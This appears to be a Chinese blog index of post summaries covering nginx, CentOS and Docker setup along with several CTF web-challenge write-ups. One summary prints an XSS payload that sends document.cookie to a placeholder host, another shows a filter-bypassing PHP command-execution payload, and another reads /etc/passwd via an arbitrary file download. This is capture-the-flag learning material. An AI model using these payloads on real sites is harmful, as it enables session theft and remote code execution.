Aninock

摘要： nginx配置好后访问会提示不安全 这时候就需要配置ssl证书，一般都是购买或者申请的，如果是内网可以用自签名证书 前置条件要安装openssl，centos7.9应该默认安装 可以通过 以下指令查看版本 openssl version 首先安装nginx，创建目录，等会证书文件就放在这 mkdir 阅读全文

摘要： centos7.9 安装nginx 先下一些环境 yum install -y gcc yum install -y pcre pcre-devel yum install -y zlib zlib-devel yum install -y openssl openssl-devel nginx直接 阅读全文

摘要： 拿了两个月会员。。 热身 很明显是一句话木马，但是直接找找不到flag，这里要用到find 直接找flag找不到这里查secret，找到了cat secret.php即可 web1 这是一个写入函数，传入一个参数，前面作为写入的文件名content，写入的内容是一个退出语句加上content 比如我 阅读全文

摘要： 进去是一个网站，主页是字符画，尝试看看f12 看到提示不要扫描和渗透，前端确实只有字符 看wp，字符串结尾是onion 意思是用tor访问，没下这个，这里先记下，下了补上。 阅读全文

摘要： 基本环境 yum install -y yum-utils device-mapper-persistent-data lvm2 换源 yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/doc 阅读全文

摘要： 进去是一个主页，点击注册 发现注册这里的验证码没用到，而且内容也一直不变，右击新建打开 发现传了一串base64的参数，解码是c81e728.jpg，怀疑是任意文件下载，尝试下载 /etc/passwd 确实是任意文件下载，下面就是要再找到flag的路径 尝试确定中间件，这里我先看了历史命令记录，下 阅读全文

摘要： 面对最简单的系统来装的，所以啥东西都要自己装 因为最后我要在断网状态下安装，所以中间涉及的安装包我都是先下载，再安装，不一次性安装 准备 一开始就发现wget没有 yum install --downloadonly --downloaddir=下载路径 wget rpm -i 下载的文件 换源（下 阅读全文

摘要： ctf打到现在第一次打AWD 这次是每组两个人有两个主机要保护，由于一共就比1.5h，前15分钟加固，后面是混战 目标是保护flag，同时两台主机的网站必须能访问（php），大家开始都一样 两台主机开始都不是root权限，我们开始进去首先改了下ssh密码，由于提示开始网站里有自带后门，所以尝试找后门 阅读全文

摘要： web316 <script>var img = document.createElement("img");//创建img标签 img.src = "http://ip?cookie="+document.cookie;//设置img标签的src </script>或者<script>locati 阅读全文

摘要： 根据cookie里面的提示，get传入looklook参数 代码就是无符号命令执行，注意数字1到3和大写字母C没过滤 ~和|和^都过滤掉了，注意$没过滤，加减也没过滤可以尝试自增构造 payload ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_++;$_++ 阅读全文